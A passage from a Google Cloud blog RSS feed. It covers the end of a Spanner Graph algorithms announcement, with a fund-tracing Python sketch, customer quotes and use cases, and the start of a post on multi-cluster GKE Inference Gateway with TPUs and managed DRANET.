RETURN ringleader.id AS ringleader_id, receiver.id AS receiver_id, e.amount, e.ts;&lt;/code&gt;&lt;/pre&gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
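&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The tracing step follows chains of one to five transfers out of the ringleader's account. The sketch below approximates that idea with a hop-bounded breadth-first search in Python. It is a simplification under stated assumptions: it reports each reachable receiver once with its shortest hop count instead of returning every matching path, it requires every transfer in a chain to be later than the cutoff date, and the sample data and function name are hypothetical.&lt;/span&gt;&lt;/p&gt;

```python
from collections import deque
from datetime import date

# Hypothetical transfers: (sender, receiver, amount, transfer date).
TRANSFERS = [
    ("boss", "m1", 900.0, date(2025, 12, 3)),
    ("m1", "m2", 850.0, date(2025, 12, 4)),
    ("m2", "m3", 800.0, date(2025, 12, 5)),
    ("boss", "old", 100.0, date(2025, 11, 1)),
]


def trace_funds(start, transfers, after, max_hops=5):
    """Map each receiver reachable from `start` to its shortest hop count.

    Only transfers dated later than `after` are followed, and the search
    stops expanding once a chain reaches `max_hops` transfers.
    """
    outgoing = {}
    for src, dst, _amount, ts in transfers:
        if ts > after:
            outgoing.setdefault(src, []).append(dst)
    hops = {}
    queue = deque([(start, 0)])
    while queue:
        node, depth = queue.popleft()
        if depth == max_hops:
            continue
        for nxt in outgoing.get(node, []):
            # Skip the starting account and receivers already reached.
            if nxt != start and nxt not in hops:
                hops[nxt] = depth + 1
                queue.append((nxt, depth + 1))
    return hops
```

&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With the sample data and a cutoff of December 1, 2025, the search reaches three accounts and ignores the transfer made in November.&lt;/span&gt;&lt;/p&gt;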
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By allowing you to weave high-performance algorithms with standard GQL queries, Spanner Graph eliminates the need to move data back and forth between operational databases and external analytics engines. This unified approach dramatically simplifies your data architecture and accelerates your time to insight.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Trusted by industry leaders&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Customers like DaVita, Yahoo!, SoundCloud, and WPP are already leveraging Spanner Graph algorithms to solve some of their most complex data challenges.&lt;/span&gt;&lt;/p&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;"Leveraging Spanner Graph for our Patient 360 initiative has allowed us to consolidate complex healthcare data into a single, unified view. The addition of native graph algorithms like community detection and centrality is a major step forward, enabling us to uncover deep insights within our patient networks faster and at scale. These fully managed capabilities allow our team to focus on driving innovation in patient care without the operational burden of managing complex data pipelines." -&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; Sam Ghosh, Chief Enterprise Architect at DaVita Kidney Care&lt;/span&gt;&lt;/p&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;"Operating at global scale across Yahoo’s iconic consumer properties requires us to unify billions of user profiles into a single, real-time view. With Spanner Graph, we’ve modeled our Unified User Profile (UUP) as a graph, bringing together previously distributed systems into a centralized source of truth. The addition of fully managed graph algorithms on Spanner further accelerates our ability to deliver personalization at scale. By leveraging algorithms such as community detection and PageRank, we can drive deeper audience segmentation and power more relevant, engaging user experiences across our platform." -&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; Chris James, Director of Engineering, Yahoo&lt;/span&gt;&lt;/p&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;"With 500+ million tracks from 40+ million artists across 190+ countries, SoundCloud is where emerging artists find their sound, hidden gems are discovered, and music culture is shaped in real time. We have been running graph algorithms in batch mode for years, with processes often taking multiple hours on custom clusters to analyze our massive, multi-billion-edge music graph. The launch of Spanner Graph algorithms is a true game-changer: It not only provides the massive scalability we need, but also allows us to move away from complex custom Python workflows to a fully managed service. Most importantly, it unlocks the ability to run graph algorithms on our most up-to-date data for use cases like identifying creator hubs and improving recommendations, without requiring complex ETL pipelines or impacting the low-latency transactional workloads running on Spanner today.&lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;"&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; - &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Sergey Chekanskiy,&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; VP of Engineering - Data Foundation, SoundCloud&lt;/span&gt;&lt;/p&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;“We've been eager to leverage advanced graph algorithms for Open Intelligence, our foundational intelligence layer that securely connects trillions of live data points from clients, partners and WPP in a privacy-first way and that is now integrated and powers WPP’s agentic marketing platform, WPP Open. In order to have instant, exploratory access to complex relationships across billions of entities – driving planning, modelling, and experimentation — we need native support for deep graph traversal, structural pattern recognition, and advanced algorithms. Algorithm support on Spanner Graph provides the performance and scalability to tackle our most challenging graph analytics problems without operational overhead or expensive licensing."&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; - Rob Marshall, Head of Strategy, Data &amp;amp; Intelligence, WPP&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Build more intelligent applications&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Now with native support for algorithms in &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Spanner Graph you can move beyond basic relationship traversals and run deep structural analytics directly on your freshest transaction data. By applying these classic graph algorithms at scale, you can unlock new capabilities for your enterprise applications:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Proactive fraud detection and anti-money laundering&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Expose coordinated fraud rings by automatically grouping connected mule accounts with Community Detection (like modularity clustering), then apply centrality (like PageRank) to pinpoint the ringleader &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;who controls the illegal fund flow.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Customer 360 and entity resolution&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Unify fragmented, cross-channel data into a single canonical profile using similarity functions like Jaccard and community detection like label propagation. These profiles can be further enriched for downstream ML training by generating topological features, such as PageRank, for each node.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Autonomous network operations and digital twins&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Model your IT or telecom infrastructure as a digital twin, using similarity and path finding (like set-to-set shortest path) to proactively identify critical vulnerabilities and predict cascading failures.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Hyper-personalized product recommendations&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Move beyond basic purchase histories by analyzing broader user behaviors. Use similarity algorithms (like common neighbors) to find overlapping preferences between entities, and centrality (like personalized PageRank) to surface the most relevant recommendations for those peer groups.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Resilient supply chain and logistics&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Protect your supply chain from hidden bottlenecks using centrality (like betweenness centrality) to pinpoint over-relied-upon distribution hubs, and path finding to instantly calculate efficient alternative routes during disruptions.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Cybersecurity threat hunting and blast-radius analysis&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Accelerate threat hunting by applying community detection (like correlation clustering) to isolate anomalous machine communications, and path finding to trace the attacker's exact lateral movement and blast radius.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Predictive customer churn analysis&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Stop contagious customer churn by mapping out tight-knit subscriber groups with community detection, then apply centrality to identify and target core influencers with retention promotions before the churn spreads.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Get started today&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Spanner Graph &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;algorithms&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; are supported with the Enterprise and Enterprise+ editions of Spanner. To learn more, view the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/spanner/docs/graph/graph-algorithms-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; or try out this &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/spanner-graph-algorithms" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;codelab&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. You can also watch &lt;/span&gt;&lt;a href="https://youtu.be/mlmcaB2mLOs?si=U-mdC0ZF8Nyli6Rx" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;this video&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for a summary of graph algorithm support with Spanner Graph.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</description><pubDate>Tue, 02 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/databases/introducing-spanner-graph-algorithms/</guid><category>Spanner</category><category>Databases</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Announcing Spanner Graph algorithms: Google-grade intelligence for connected data</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/products/databases/introducing-spanner-graph-algorithms/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Bei Li</name><title>Sr. 
Staff Software Engineer</title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Vahab Mirrokni</name><title>VP, Google Fellow, Graph Mining, Google Research</title><department></department><company></company></author></item><item><title>Experimenting with TPUs, GKE Managed DRANET, and Multi-cluster Inference Gateway</title><link>https://cloud.google.com/blog/topics/developers-practitioners/experimenting-with-tpus-gke-managed-dranet-and-multi-cluster-inference-gateway/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;What happens when your workload fails in one region but you still need access to the service? This is a common availability and uptime scenario. With recent enhancements to the Kubernetes ecosystem, such as &lt;/span&gt;&lt;a href="https://kubernetes.io/docs/concepts/scheduling-eviction/dynamic-resource-allocation/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Dynamic Resource Allocation (DRA)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://gateway-api-inference-extension.sigs.k8s.io/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Inference Gateway&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, I decided to experiment with these capabilities in Google Cloud in a simple test using an AI inference workload.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this blog, we will explore this setup and you can also jump straight into the detailed configs in this codelab &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/codelabs/gke-inference-gateway-multi-cluster-tpus-dranet#0" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Build multi-cluster GKE Inference Gateway, with TPUs , Cloud Storage FUSE and managed DRANET.&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Building blocks &lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To build out this experiment, use the following products, features, and tools:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Google Kubernetes Engine &lt;/span&gt;&lt;/strong&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/allocate-network-resources-dra"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;&lt;strong&gt;(GKE) managed DRANET&lt;/strong&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: This is a managed feature that lets you request and share resources among Pods. This supports &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/allocate-network-resources-dra#use-rdma-interfaces-gpu"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GPUs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/allocate-network-resources-dra#use-non-rdma-interfaces-tpu"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;TPUs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. In this test TPUs were used in two different regions with networking assigned using managed DRANET.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/about-multi-cluster-inference-gateway"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;&lt;strong&gt;Multi-cluster GKE Inference gateway&lt;/strong&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: Load balances your AI/ML inference workloads across multiple GKE clusters. This works in a failover situation which is what my experiment intended to test. The type which supports this is the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/gateway-api#gatewayclass"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Multi-cluster Cross-region internal Application Load Balancer&lt;/span&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;code style="vertical-align: baseline;"&gt;gke-l7-cross-regional-internal-managed-mc&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://docs.cloud.google.com/storage/docs/cloud-storage-fuse/overview"&gt;&lt;strong&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Storage FUSE&lt;/span&gt;&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: Provides a way to store data, models, checkpoints, and logs directly in Cloud Storage. To speed up the deployment, an open source gemma model was downloaded to this storage for retrieval. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Virtual private Cloud (VPC)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: The foundational global network providing isolated, secure communication for the internal load balancers and compute nodes&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/fleets-overview"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;GKE Fleets&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: Fleets group the separate regional clusters under a unified management control plane&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://docs.cloud.google.com/tpu/docs/v6e"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;TPU v6e&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Google's custom AI accelerators that provide the high-performance compute required to serve the model. The VM family type used was the  &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ct6e-standard-4t&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; in a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/tpu/docs/v6e#configurations"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;2x2 Slice&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Design pattern example&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;The aim is to deploy a LLM model (Gemma 3) onto 2 GKE clusters in different regions. Each cluster will use 4 TPU v6e chips. The model should be stored in Cloud Storage. The workload is served using GKE Inference Gateway which supports multi-clusters. The traffic should be routed to the region closest to the user and failover to the other region if one region fails.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1-build.max-1000x1000.png"
        
          alt="1-build"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div data-draftjs-conductor-fragment='{"blocks":[{"key":"ct469","text":"Putting it together","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"a673f","text":"To get access to the TPUs for your project in two regions you have to ensure you have the necessary quota in those regions.","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":90,"length":15,"key":0}],"data":{}},{"key":"8ufpl","text":"Begin: Set up the environment","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":6,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"3hun0","text":"Create a standard VPC, with firewall rules and subnet in the same zone as the reservation.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":9,"length":12,"key":1}],"data":{}},{"key":"afkbe","text":"Create a proxy-only subnet this will be used with the Internal regional application load balancer attached to the GKE inference gateway.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":9,"length":17,"key":2}],"data":{}},{"key":"23sv0","text":"Set up firewall rules allowing traffic and health checks.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"b83on","text":"Reserve static internal IP addresses in both regions for the Gateway.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"5sqev","text":"Provision a Cloud Storage FUSE bucket and configure a dedicated IAM Service Account. 
Bind this to a Kubernetes Workload Identity so your pods can securely mount the bucket and read the model weights directly.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"65eu0","text":"Next: Create standard GKE clusters and node pools","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":49,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"3nj2n","text":"Deploy two separate GKE clusters in your chosen regions configured.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"d6395","text":"Enable the Gateway API (--gateway-api=standard) and the Cloud Storage FUSE CSI driver (--addons GcsFuseCsiDriver) during cluster creation.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[{"offset":24,"length":22,"style":"CODE"},{"offset":87,"length":25,"style":"CODE"},{"offset":24,"length":22,"style":"ITALIC"},{"offset":87,"length":25,"style":"ITALIC"}],"entityRanges":[{"offset":55,"length":30,"key":3}],"data":{}},{"key":"37hd5","text":"Create dedicated TPU v6e node pools (ct6e-standard-4t) for both clusters.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[{"offset":37,"length":16,"style":"CODE"},{"offset":37,"length":16,"style":"ITALIC"}],"entityRanges":[],"data":{}},{"key":"e6o1h","text":"Enable managed DRANET on these TPU node pools by setting the flags\n ---accelerator-network-profile=auto, and\n --node-labels=cloud.google.com/gke-networking-dra-driver=true.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[{"offset":68,"length":35,"style":"CODE"},{"offset":110,"length":61,"style":"CODE"},{"offset":68,"length":35,"style":"ITALIC"},{"offset":110,"length":62,"style":"ITALIC"}],"entityRanges":[{"offset":31,"length":14,"key":4}],"data":{}},{"key":"e6iod","text":"Next: Establish the global mesh via Fleet 
Registration","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":54,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"8nj7o","text":"Register both GKE clusters to a unified GKE Fleet by following the fleet creation and registration setup.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":66,"length":38,"key":5}],"data":{}},{"key":"6f71o","text":"Enable Multi-Cluster Service Discovery and Multi-Cluster Ingress on your fleet.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"cbent","text":"Designate your primary region as the configuration hub to act as the control plane for routing rules across both regions.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"2k3c3","text":"Next: Deploy the AI Workload","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":28,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"b56k8","text":"Use a temporary Kubernetes job to download the Gemma 3 (gemma-3-27b-it) model weights directly into your Cloud Storage bucket.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[{"offset":56,"length":14,"style":"CODE"},{"offset":56,"length":14,"style":"ITALIC"}],"entityRanges":[],"data":{}},{"key":"lihp","text":"Define a ResourceClaimTemplate that explicitly requests the managed DRANET device class (deviceClassName: netdev.google.com) with the allocation mode set to 
\"All\".","type":"unordered-list-item","depth":0,"inlineStyleRanges":[{"offset":9,"length":21,"style":"CODE"},{"offset":89,"length":34,"style":"CODE"},{"offset":9,"length":21,"style":"ITALIC"},{"offset":89,"length":34,"style":"ITALIC"}],"entityRanges":[],"data":{}}],"entityMap":{"0":{"type":"LINK","mutability":"MUTABLE","data":{"url":"https://docs.cloud.google.com/kubernetes-engine/docs/how-to/tpus#ensure-quota-od-spot"}},"1":{"type":"LINK","mutability":"MUTABLE","data":{"url":"https://docs.cloud.google.com/vpc/docs/create-modify-vpc-networks#create-custom-network"}},"2":{"type":"LINK","mutability":"MUTABLE","data":{"url":"https://docs.cloud.google.com/load-balancing/docs/proxy-only-subnets#proxy_only_subnet_create"}},"3":{"type":"LINK","mutability":"MUTABLE","data":{"url":"https://cloud.google.com/kubernetes-engine/docs/concepts/cloud-storage-fuse-csi-driver"}},"4":{"type":"LINK","mutability":"MUTABLE","data":{"url":"https://docs.cloud.google.com/kubernetes-engine/docs/how-to/allocate-network-resources-dra#enable-dra-driver-tpu"}},"5":{"type":"LINK","mutability":"MUTABLE","data":{"url":"https://cloud.google.com/kubernetes-engine/docs/how-to/creating-fleets"}}}}'&gt;
&lt;h2 class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="czag4-0-0"&gt;&lt;span data-offset-key="czag4-0-0"&gt;Putting it together&lt;/span&gt;&lt;/h2&gt;
&lt;div class="Draftail-block--unstyled" data-block="true" data-editor="4apjo" data-offset-key="31jqe-0-0"&gt;
&lt;div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="31jqe-0-0"&gt;&lt;span data-offset-key="31jqe-0-0"&gt;To get access to the TPUs for your project in two regions you have to ensure you have the &lt;/span&gt;&lt;a class="TooltipEntity" data-draftail-trigger="true" href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/tpus#ensure-quota-od-spot" role="button"&gt;&lt;span data-offset-key="31jqe-1-0"&gt;necessary quota&lt;/span&gt;&lt;/a&gt;&lt;span data-offset-key="31jqe-2-0"&gt; in those regions.&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="Draftail-block--unstyled" data-block="true" data-editor="4apjo" data-offset-key="9e8ff-0-0"&gt;
&lt;div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="9e8ff-0-0"&gt; &lt;/div&gt;
&lt;div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="9e8ff-0-0"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Begin:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Set up the environment. &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Create a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/vpc/docs/create-modify-vpc-networks#create-custom-network"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;standard VPC&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, with firewall rules and subnet in the same zone as the reservation.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Create a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/load-balancing/docs/proxy-only-subnets#proxy_only_subnet_create"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;proxy-only subnet&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; this will be used with the Internal regional application load balancer attached to the GKE inference gateway&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Set up firewall rules allowing traffic and health checks.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Reserve static internal IP addresses in both regions for the Gateway.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Provision a Cloud Storage FUSE bucket and configure a dedicated IAM Service Account. Bind this to a Kubernetes Workload Identity so your pods can securely mount the bucket and read the model weights directly.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
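&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As a rough sketch of the Workload Identity step, the Kubernetes side can be as small as one annotated ServiceAccount. The name &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gemma-ksa&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;GSA_NAME&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;PROJECT_ID&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; placeholders are assumptions for illustration, not values from this experiment. The IAM service account also needs read access to the bucket and a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;roles/iam.workloadIdentityUser&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; binding for this Kubernetes service account, both of which are set up separately in IAM.&lt;/span&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Sketch only: gemma-ksa, GSA_NAME and PROJECT_ID are illustrative placeholders.
apiVersion: v1
kind: ServiceAccount
metadata:
  name: gemma-ksa
  namespace: default
  annotations:
    # Links this Kubernetes service account to the dedicated IAM service account.
    iam.gke.io/gcp-service-account: GSA_NAME@PROJECT_ID.iam.gserviceaccount.com&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Apply the same manifest in both clusters so the Pods in each region can mount the bucket under the same identity.&lt;/span&gt;&lt;/p&gt;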
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Next: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Create standard GKE clusters and node pools.&lt;/span&gt;&lt;/p&gt;
